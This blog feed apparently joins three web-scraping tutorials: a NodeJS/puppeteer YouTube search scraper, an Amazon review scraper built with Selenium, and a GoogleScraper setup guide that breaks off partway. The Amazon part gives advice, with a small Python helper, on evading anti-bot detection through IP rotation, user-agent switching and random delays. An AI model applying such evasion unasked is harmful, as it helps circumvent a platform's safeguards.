<p>If you are short on time, just download the library from the <a href="https://github.com/NikolaiT/youtube-scraping">GitHub repository</a> and follow the instructions there.</p>
<h3>You are not a programmer?</h3>
<p>If you are not a programmer, you can still scrape data from YouTube (and many other search engines).
I created a service called <a href="https://scrapeulous.com/">Scrapeulous.com</a> where you can submit keyword files that are then scraped for you.</p>
<h3>Why would you want to scrape YouTube videos?</h3>
<p>If you are a <strong>content creator</strong>, you might be interested in your competitors and want to know what kind of videos they are publishing.
And maybe there are 500 video creators in your niche and you cannot monitor all their content by yourself. Therefore, you want to automate
this task. You scrape all new videos from all your competitors and then you look for certain keywords in the title and video description.</p>
<p>With this information you can determine if your competitors are</p>
<ul>
<li>stealing content from you</li>
<li>having success with a certain keyword</li>
<li>using better marketing strategies than you</li>
</ul>
<p>If you are a <strong>scientist</strong>, you might be interested in the spreading of fake news, for example. You want to monitor the sources of fake news. After some
hard work you compiled a list of fake news channels and your next step is to monitor this content periodically. To do so, you are interested
in scraping every newly published video. Then you can determine where the news originated.</p>
<p>If you have a list of your <strong>favourite music videos</strong>, you need the YouTube URLs in order to download the videos. Using the YouTube API is not always a pleasure, since
it is a little complex. Therefore this tool helps you to quickly find the links that you need.</p>
<p>There are many other scenarios that motivate collecting information from YouTube. You just need to be creative enough!</p>
<h3>What tools do you need?</h3>
<p>We are going to develop the YouTube Scraper in NodeJS. My version is:</p>
<div class="highlight"><pre><span></span><code>$ node -v
v10.12.0
</code></pre></div>
<p>Let's make a project folder.</p>
<div class="highlight"><pre><span></span><code>mkdir youtube-scraping && cd youtube-scraping
</code></pre></div>
<p>Init a new node project with:</p>
<div class="highlight"><pre><span></span><code>npm init
</code></pre></div>
<p>Then we are ready to go. First of all we need to install some third party libraries in order for our code to work.</p>
<p>Install puppeteer:</p>
<div class="highlight"><pre><span></span><code>npm i puppeteer
</code></pre></div>
<p>Install cheerio:</p>
<div class="highlight"><pre><span></span><code>npm i cheerio
</code></pre></div>
<p>Now our directory should look similar to this:</p>
<div class="highlight"><pre><span></span><code>drwxr-xr-x 57 nikolai nikolai 4096 Okt 29 14:20 node_modules/
-rw-r--r-- 1 nikolai nikolai 685 Okt 29 14:20 package.json
-rw-r--r-- 1 nikolai nikolai 16500 Okt 29 14:20 package-lock.json
</code></pre></div>
<h3>Our scraping program</h3>
<p>We are going to create two files. The first one is <code>youtube.js</code>, the library that enables us to scrape
YouTube. We will not go through every line since the code should be more or less
self-explanatory. Here is the code of <code>youtube.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">cheerio</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cheerio'</span><span class="p">);</span>
<span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">scrape_youtube</span><span class="o">:</span> <span class="nx">scrape_youtube</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">const</span> <span class="nx">all_videos</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">sleep</span> <span class="o">=</span> <span class="nx">seconds</span> <span class="p">=></span>
<span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="nx">resolve</span> <span class="p">=></span> <span class="nx">setTimeout</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="p">(</span><span class="nx">seconds</span> <span class="o">||</span> <span class="mf">1</span><span class="p">)</span> <span class="o">*</span> <span class="mf">1000</span><span class="p">));</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setViewport</span><span class="p">({</span> <span class="nx">width</span><span class="o">:</span> <span class="mf">1280</span><span class="p">,</span> <span class="nx">height</span><span class="o">:</span> <span class="mf">800</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://www.youtube.com'</span><span class="p">);</span>
<span class="c1">// declare results before the try block so the early return below can use it</span>
<span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">{};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'input[id="search"]'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">results</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// before we do anything, parse the results of the front page of youtube</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'ytd-video-renderer,ytd-grid-video-renderer'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">10000</span> <span class="p">});</span>
<span class="kd">let</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="nx">results</span><span class="p">[</span><span class="s1">'__frontpage__'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">keywords</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">keyword</span> <span class="o">=</span> <span class="nx">keywords</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$</span><span class="p">(</span><span class="s1">'input[id="search"]'</span><span class="p">);</span>
<span class="c1">// overwrites last text in input</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">click</span><span class="p">({</span> <span class="nx">clickCount</span><span class="o">:</span> <span class="mf">3</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">type</span><span class="p">(</span><span class="nx">keyword</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">focus</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">keyboard</span><span class="p">.</span><span class="nx">press</span><span class="p">(</span><span class="s2">"Enter"</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForFunction</span><span class="p">(</span><span class="sb">`document.title.indexOf('</span><span class="si">${</span><span class="nx">keyword</span><span class="si">}</span><span class="sb">') !== -1`</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'ytd-video-renderer,ytd-grid-video-renderer'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">sleep</span><span class="p">(</span><span class="mf">1</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="nx">results</span><span class="p">[</span><span class="nx">keyword</span><span class="p">]</span> <span class="o">=</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="sb">`Problem with scraping </span><span class="si">${</span><span class="nx">keyword</span><span class="si">}</span><span class="sb">: </span><span class="si">${</span><span class="nx">e</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">results</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// load the page source into cheerio</span>
<span class="kd">const</span> <span class="nx">$</span> <span class="o">=</span> <span class="nx">cheerio</span><span class="p">.</span><span class="nx">load</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="c1">// perform queries</span>
<span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'#contents ytd-video-renderer,#contents ytd-grid-video-renderer'</span><span class="p">).</span><span class="nx">each</span><span class="p">((</span><span class="nx">i</span><span class="p">,</span> <span class="nx">link</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span>
<span class="nx">link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#video-title'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">title</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#video-title'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">snippet</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#description-text'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">channel</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#byline a'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">channel_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#byline a'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">num_views</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#metadata-line span:nth-child(1)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">release_date</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#metadata-line span:nth-child(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="p">})</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">cleaned</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">results</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">res</span> <span class="o">=</span> <span class="nx">results</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">link</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">link</span><span class="p">.</span><span class="nx">trim</span><span class="p">()</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">.</span><span class="nx">trim</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">.</span><span class="nx">trim</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">snippet</span> <span class="o">=</span> <span class="nx">res</span><span class="p">.</span><span class="nx">snippet</span><span class="p">.</span><span class="nx">trim</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">rank</span> <span class="o">=</span> <span class="nx">i</span><span class="o">+</span><span class="mf">1</span><span class="p">;</span>
<span class="c1">// check if this result has been used before</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">all_videos</span><span class="p">.</span><span class="nx">has</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">)</span> <span class="o">===</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">cleaned</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">res</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">all_videos</span><span class="p">.</span><span class="nx">add</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">time</span><span class="o">:</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">toUTCString</span><span class="p">(),</span>
<span class="nx">results</span><span class="o">:</span> <span class="nx">cleaned</span><span class="p">,</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<h3>Using the library</h3>
<p>Now it is time to call the library and scrape some keywords and find all the videos for those
keywords.</p>
<p>Create a file <code>index.js</code> and paste the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">youtube</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./youtube'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'stupid prank'</span><span class="p">,</span>
<span class="s1">'scraping youtube'</span><span class="p">,</span>
<span class="s1">'climbing lothse'</span><span class="p">,</span>
<span class="s1">'incolumitas.com'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">();</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">youtube</span><span class="p">.</span><span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">results</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="c1">// always close the browser, even when scraping fails</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">})().</span><span class="k">catch</span><span class="p">(</span><span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">);</span> <span class="c1">// a synchronous try/catch would not see errors thrown inside the async function</span>
</code></pre></div>
<p>You can enter whatever keywords you want in the <code>keywords</code> array.</p>
<p>Start the scraping with the following command:</p>
<div class="highlight"><pre><span></span><code>node index.js
</code></pre></div>
<p>This yields the <a href="/data/youtube-scraping.json">following results in JSON format</a>.</p>
<h3>The Scraper Source Code</h3>
<p>The scraper can be found <a href="https://github.com/NikolaiT/youtube-scraping">in this GitHub repository</a>.</p>
<p>In order to run the scraper, you first need to clone the repository:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/youtube-scraping
</code></pre></div>
<p>Then install dependencies:</p>
<div class="highlight"><pre><span></span><code>npm install
</code></pre></div>
<p>Create a source file in the directory into which you cloned the repository and
add the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">youtube</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./youtube'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// The try/catch lives inside the async function; outside of it, a rejected promise would never be caught.</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'scrapeulous.com'</span><span class="p">,</span>
<span class="s1">'scraping youtube'</span><span class="p">,</span>
<span class="s1">'stupid prank'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">youtube</span><span class="p">.</span><span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">results</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})();</span>
</code></pre></div>Scraping Amazon Reviews using Headless Chrome Browser and Python32018-10-03T17:02:00+02:002018-10-03T17:02:00+02:00Nikolai Tschachertag:incolumitas.com,2018-10-03:/2018/10/03/scraping-amazon-reviews/<p>Tutorial that teaches how to scrape Amazon reviews</p><p>In this tutorial we are going to learn how to scrape Amazon Reviews using Python and a headless Chrome browser.</p>
<h3>Why scrape Amazon reviews?</h3>
<p>There are many reasons why it is interesting to scrape the reviews of an Amazon product.</p>
<p>For example, you may want to find out whether somebody spams fake reviews, and conduct a content analysis for that purpose. In order to achieve this, you
are going to need the reviews as text data to launch your analysis.</p>
<p>Another reason is to find out what kind of reviews people are upvoting the most and then copy the style, structure and approach of these reviews
for your own products. The scraper also collects the number of upvotes for each review.</p>
<p>There are countless other reasons why scraping review data might be an interesting idea. A lot of them have to do with business intelligence and
marketing analysis.</p>
<h3>Scraping reviews with headless browsers</h3>
<p>Of course one could scrape reviews by using low-level HTTP clients like <strong>curl</strong> or the <strong>requests</strong> library, but this makes it much easier
for Amazon to detect scraping efforts. Therefore the best solution is to mimic real users by using real browsers.</p>
<p>This led us to choose headless Chrome and ChromeDriver, controlled through the browser automation framework Selenium.</p>
<p>With this stack (headless Chrome, Selenium, Python) we will build our scraper.</p>
<h3>How to prevent being banned by Amazon?</h3>
<p>There are several ways in which a service provider like Amazon can detect scraping bots:</p>
<ol>
<li>Requests originate from a limited pool of IP addresses.</li>
<li>The browser profile is always the same or similar.</li>
<li>The requests follow a similar pattern time-wise.</li>
</ol>
<p>These three are the obvious patterns. There are many more ways to detect scraping bots, but
Amazon has a hard time banning them, because filtering them out creates too many false positives.</p>
<p>So how can you avoid being banned?</p>
<ol>
<li>Use a large pool of distinct IP addresses (proxies, IP rotation services, cloud providers).</li>
<li>Change the user agent and the identifying plugins/libraries of your browser.</li>
<li>Insert random sleeps before scraping new reviews.</li>
</ol>
<p>I know from experience that <strong>it is hard</strong> to achieve those three points, <strong>especially point 1</strong>.</p>
<p>Therefore, if you have a large scraping project, <strong>you can always hire me to launch such a scraping project for you</strong>.
Head to the contact section of this blog and write me an email so that we can discuss your project's goals.</p>
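<p>Points 2 and 3 of the list above can be sketched in a few lines of Python. This is only a minimal illustration and not the code of the scraper itself: the user agent strings, the function names and the delay bounds are assumptions chosen for this example.</p>

```python
import random
import time

# Example user agent strings, for illustration only; use current, real ones in practice.
USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
]


def pick_user_agent():
    """Return a randomly chosen user agent for the next browser session."""
    return random.choice(USER_AGENTS)


def random_delay(min_seconds=2.0, max_seconds=8.0):
    """Draw a waiting time uniformly from [min_seconds, max_seconds]."""
    return random.uniform(min_seconds, max_seconds)


def sleep_before_next_page(min_seconds=2.0, max_seconds=8.0):
    """Sleep for a random time so that requests do not follow a fixed rhythm."""
    delay = random_delay(min_seconds, max_seconds)
    time.sleep(delay)
    return delay
```

<p>The chosen user agent would then be passed to the browser when it is started, and <code>sleep_before_next_page()</code> would be called before every new review page is loaded.</p>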
<h3>The Scraper Source Code</h3>
<p>The scraper can be found <a href="https://github.com/NikolaiT/scraping-amazon-reviews">in this GitHub repository</a>.</p>
<p>In order to run the scraper, you first need to clone the repository:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/scraping-amazon-reviews
</code></pre></div>
<p>Then you need to download the headless Chrome browser and ChromeDriver. You can do so with this command:</p>
<div class="highlight"><pre><span></span><code>./setup.sh
</code></pre></div>
<p>Now you can scrape Amazon reviews by editing the file <code>scraper.py</code> and adding the Amazon product URLs whose reviews you want:</p>
<div class="highlight"><pre><span></span><code><span class="k">if</span> <span class="nv">__name__</span> <span class="o">==</span> <span class="s1">'</span><span class="s">__main__</span><span class="s1">'</span>:
    <span class="nv">config</span> <span class="o">=</span> {
        <span class="s2">"</span><span class="s">urls</span><span class="s2">"</span>: [
            <span class="s2">"</span><span class="s">https://www.amazon.de/Crocs-Crocband-Unisex-Erwachsene-Charcoal-Ocean/dp/B007B9MI8K/ref=sr_1_1?s=shoes&ie=UTF8&qid=1537363983&sr=1-1</span><span class="s2">"</span>,
            <span class="s2">"</span><span class="s">https://www.amazon.de/Samsung-UE55MU6179U-Fernseher-Triple-Schwarz/dp/B06XGS3Q4Y/ref=sr_1_4?s=home-theater&ie=UTF8&qid=1538584798&sr=1-4&keywords=tv</span><span class="s2">"</span>,
            <span class="s2">"</span><span class="s">https://www.amazon.de/gp/product/B07BKN76JS/ref=s9_acsd_zwish_hd_bw_bDtHh_cr_x__w?pf_rd_m=A3JWKAKR8XB7XF&pf_rd_s=merchandised-search-8&pf_rd_r=TM716ESMTY46877D33XM&pf_rd_r=TM716ESMTY46877D33XM&pf_rd_t=101&pf_rd_p=5f7031a3-d321-54f0-8d79-d0961244d5fa&pf_rd_p=5f7031a3-d321-54f0-8d79-d0961244d5fa&pf_rd_i=3310781</span><span class="s2">"</span>
        ]}
    <span class="nv">main</span><span class="ss">(</span><span class="nv">config</span><span class="ss">)</span>
</code></pre></div>
<p>Then just run the scraper:</p>
<div class="highlight"><pre><span></span><code>python src/scraper.py
</code></pre></div>GoogleScraper Tutorial - How to scrape 1000 keywords with Google2018-09-05T18:21:00+02:002018-09-07T18:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-09-05:/2018/09/05/googlescraper-tutorial/<p>Tutorial that teaches how to use GoogleScraper to scrape 1000 keywords with 10 selenium browsers.</p><p>In this tutorial we are going to show users how to use <a href="https://github.com/NikolaiT/GoogleScraper">GoogleScraper</a>.</p>
<p>The best way to learn a new tool is to use it in a real-world case study. And because GoogleScraper allows you to
query search engines automatically, we are going to scrape 1000 keywords with GoogleScraper.</p>
<p>If you don't want to use this software yourself and would rather have the job done for you, you can submit a scrape job
at <a href="https://scrapeulous.com/">scrapeulous.com</a>. Or you can visit the <a href="https://incolumitas.com/pages/scrapeulous/">site that explains scrapeulous.com</a>.</p>
<p>Anyway, let's continue...</p>
<p>Let's assume that we want to create a business in the USA. We do not yet know in which industry, and we do not know in which
city. Therefore we want to scrape some industries. I will take:</p>
<ol>
<li>coffee shop</li>
<li>pizza place</li>
<li>burger place</li>
<li>sea food restaurant</li>
<li>pastry shop</li>
<li>shoes repair</li>
<li>jeans repair</li>
<li>smartphone repair</li>
<li>wine shop</li>
<li>tea shop</li>
</ol>
<p>Because we do not know in which city we want to open our shop, we are going to combine the above shop types with the <strong>100 largest cities in the US</strong>. I took the cities from this <a href="https://gist.github.com/Miserlou/11500b2345d3fe850c92">list of the Largest 1000 Cities in America</a>. Ten shop types times 100 cities yields 1000 keyword combinations. You can see the final keyword file here: <a href="/data/list.txt">keyword file</a>.</p>
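<p>Such a keyword file can be generated with a short script. The following is a minimal sketch and not necessarily how the linked file was created: the keyword format (shop type followed by the city name), the function names and the placeholder city names are assumptions made for this example.</p>

```python
from itertools import product

SHOP_TYPES = [
    "coffee shop", "pizza place", "burger place", "sea food restaurant",
    "pastry shop", "shoes repair", "jeans repair", "smartphone repair",
    "wine shop", "tea shop",
]


def build_keywords(shop_types, cities):
    """Combine every shop type with every city into one search keyword."""
    return [f"{shop} {city}" for shop, city in product(shop_types, cities)]


def write_keyword_file(keywords, path):
    """Write one keyword per line, the layout of a plain keyword file."""
    with open(path, "w", encoding="utf-8") as handle:
        handle.write("\n".join(keywords) + "\n")


# Placeholder city names; replace them with the 100 largest cities from the list.
cities = [f"City {i}" for i in range(1, 101)]
keywords = build_keywords(SHOP_TYPES, cities)
print(len(keywords))  # 1000
```

<p>Calling <code>write_keyword_file(keywords, "list.txt")</code> then stores the combinations with one keyword per line.</p>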
<h3>Installation of GoogleScraper</h3>
<p>First of all you need to install <strong>Python3</strong>. I personally use the <a href="https://www.anaconda.com/download/">Anaconda Python distribution</a>, because it ships with many precompiled scientific packages that I need in my everyday work. But you can also install Python3 directly from the <a href="https://www.python.org/downloads/">Python website</a>.</p>
<p>Now I assume that you have <code>python3</code> installed. In my case I have:</p>
<div class="highlight"><pre><span></span><code>$ python3 --version
Python <span class="m">3</span>.7.0
</code></pre></div>
<p>Now you need <code>pip</code>, the package manager of Python. It usually comes installed with Python already. When you have pip, you can install
<code>virtualenv</code> with <code>pip install virtualenv</code>.</p>
<p>Now that you have virtualenv, go to your project directory and create a virtual environment with <code>virtualenv env</code>.</p>
<p>In my case it looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="n">nikolai</span><span class="err">@</span><span class="n">nikolai</span><span class="p">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">$</span><span class="w"> </span><span class="n">virtualenv</span><span class="w"> </span><span class="n">env</span><span class="w"></span>
<span class="n">Using</span><span class="w"> </span><span class="n">base</span><span class="w"> </span><span class="n">prefix</span><span class="w"> </span><span class="s1">'/home/nikolai/anaconda3'</span><span class="w"></span>
<span class="n">New</span><span class="w"> </span><span class="n">python</span><span class="w"> </span><span class="n">executable</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">/</span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"></span>
<span class="n">copying</span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">anaconda3</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">/</span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"></span>
